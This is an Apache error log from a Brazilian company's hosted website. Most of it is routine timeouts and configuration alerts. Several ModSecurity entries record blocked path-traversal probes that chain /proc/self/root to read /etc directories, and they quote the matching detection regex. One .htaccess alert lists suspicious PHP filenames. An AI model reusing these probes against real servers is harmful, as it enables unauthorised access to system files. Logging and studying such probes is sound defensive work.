[Thu Mar 19 12:18:45.026995 2026] [core:alert] [pid 26799:tid 140411641214720] [client 57.141.18.17:34554] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:18:49.053830 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:58958] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:19:05.714001 2026] [core:alert] [pid 26799:tid 140411649607424] [client 57.141.18.20:34958] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:19:18.150305 2026] [proxy_fcgi:error] [pid 19093:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59828] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:19:42.181816 2026] [proxy_fcgi:error] [pid 19093:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60570] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:20:05.906871 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33038] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:20:31.157795 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33816] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:20:35.423941 2026] [:error] [pid 19093:tid 140411565680384] [client 74.7.228.61:54564] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwUQ1_V7PWP6ixUYl7HggAAApU"]
[Thu Mar 19 12:20:55.587327 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:41704] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwUV-yqAr6etmhZHNprVgAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:20:59.121795 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34662] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:21:21.069833 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35234] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:21:44.069971 2026] [proxy_fcgi:error] [pid 19093:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:35928] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:21:54.048686 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.243.128:46612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwUkv-YZRR_7pZ7nDKW8wAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:21:54.645106 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.244.43:34226] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwUkuyqAr6etmhZHNprgAAAAFE"]
[Thu Mar 19 12:22:06.121792 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36812] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:22:15.810672 2026] [mime_magic:error] [pid 15826:tid 140411741927168] (70014)End of file found: [client 57.141.18.16:39182] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:22:29.138393 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37478] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:22:40.405579 2026] [mime_magic:error] [pid 26799:tid 140411649607424] (70014)End of file found: [client 57.141.18.23:40046] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:22:53.133803 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:38148] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:23:16.109824 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38762] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:23:21.132473 2026] [mime_magic:error] [pid 14269:tid 140411607643904] (70014)End of file found: [client 57.141.18.96:40982] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:23:23.475928 2026] [core:alert] [pid 17653:tid 140411632822016] [client 57.141.18.40:41164] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:23:39.725025 2026] [mime_magic:error] [pid 27403:tid 140411666392832] (70014)End of file found: [client 57.141.18.82:41388] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:23:46.129796 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39596] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:24:05.451647 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:49120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwVFfu8EFLIOrSqIpuzfwAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:24:12.095409 2026] [mime_magic:error] [pid 26799:tid 140411733534464] (70014)End of file found: [client 74.7.243.128:60900] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/lib
[Thu Mar 19 12:24:12.095490 2026] [access_compat:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:60900] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/lib
[Thu Mar 19 12:24:13.115880 2026] [proxy_fcgi:error] [pid 15826:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40160] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:24:42.127146 2026] [proxy_fcgi:error] [pid 15826:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:40796] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:25:13.125780 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41546] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:25:28.529401 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:36166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwVaOoXxyEfFpUF8f8ZGAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:25:32.958828 2026] [mime_magic:error] [pid 19093:tid 140411666392832] (70014)End of file found: [client 57.141.18.29:44054] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:25:42.105837 2026] [proxy_fcgi:error] [pid 27293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42252] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:26:06.115725 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42868] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:26:28.093801 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43366] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:26:56.122321 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43972] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:26:56.693846 2026] [mime_magic:error] [pid 17887:tid 140411649607424] (70014)End of file found: [client 57.141.18.45:45968] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:27:02.819674 2026] [core:alert] [pid 17887:tid 140411624429312] [client 57.141.18.102:46094] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:27:18.125818 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44550] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:27:39.121971 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45050] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:27:39.535449 2026] [mime_magic:error] [pid 19093:tid 140411565680384] (70014)End of file found: [client 57.141.18.107:46916] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:28:02.155657 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:45556] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:28:25.133787 2026] [proxy_fcgi:error] [pid 27403:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46056] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:28:49.033858 2026] [proxy_fcgi:error] [pid 27403:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:29:13.125845 2026] [proxy_fcgi:error] [pid 31803:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47228] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:29:23.568034 2026] [mime_magic:error] [pid 17887:tid 140411641214720] (70014)End of file found: [client 57.141.18.117:49768] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:29:36.301851 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47756] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:29:42.999295 2026] [core:alert] [pid 30077:tid 140411716749056] [client 57.141.18.27:50268] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:29:44.896331 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:55132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwWaNa6ubjKNq_cu4ZiqAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:30:03.195733 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48338] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:30:34.133795 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48938] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:30:39.994979 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:36188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwWn_u8EFLIOrSqIpu0egAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:30:47.567808 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:50456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwWp_u8EFLIOrSqIpu0fwAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 12:30:49.488021 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.228.61:50872] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwWqfu8EFLIOrSqIpu0gwAAAkc"]
[Thu Mar 19 12:31:07.094241 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49702] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:31:44.141856 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50566] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:32:09.129833 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51106] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:32:32.133769 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51636] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:32:41.884922 2026] [core:alert] [pid 19093:tid 140411658000128] [client 57.141.18.89:54300] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 12:32:47.195022 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:50456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwXH_u8EFLIOrSqIpu0zAAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:32:54.133826 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:52224] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:33:16.129874 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52790] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:33:22.935527 2026] [core:alert] [pid 27293:tid 140411616036608] [client 57.141.18.94:55568] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:33:43.125809 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53494] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:34:05.045828 2026] [proxy_fcgi:error] [pid 15826:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54074] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:34:28.126716 2026] [proxy_fcgi:error] [pid 27403:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54740] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:34:30.888339 2026] [mime_magic:error] [pid 26799:tid 140411574073088] (70014)End of file found: [client 57.141.18.24:57420] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:34:50.127349 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55302] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:35:12.123985 2026] [proxy_fcgi:error] [pid 14269:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55718] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:35:37.121825 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56270] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:36:04.133803 2026] [proxy_fcgi:error] [pid 27403:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56982] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:36:13.765802 2026] [mime_magic:error] [pid 27403:tid 140411540502272] (70014)End of file found: [client 57.141.18.103:60314] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:36:32.037907 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57690] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:37:01.126049 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58296] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:37:05.272240 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.244.43:50560] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwYIQkwaGbbGflqUZDT0AAAAMw"]
[Thu Mar 19 12:37:34.133796 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:59096] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:37:59.094573 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59752] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:38:21.617575 2026] [mime_magic:error] [pid 26799:tid 140411540502272] (70014)End of file found: [client 57.141.18.106:35520] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:38:24.131188 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60462] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:38:48.085805 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:32830] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:39:12.141777 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33568] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:39:34.121589 2026] [proxy_fcgi:error] [pid 27293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34140] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:39:47.605026 2026] [core:alert] [pid 26799:tid 140411557287680] [client 57.141.18.84:37728] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:39:57.131831 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34786] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:40:20.061852 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35424] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:40:44.261783 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36092] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:40:51.531368 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.228.61:36412] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwZAwbLMZ6AikZjR9VrMgAAAAA"]
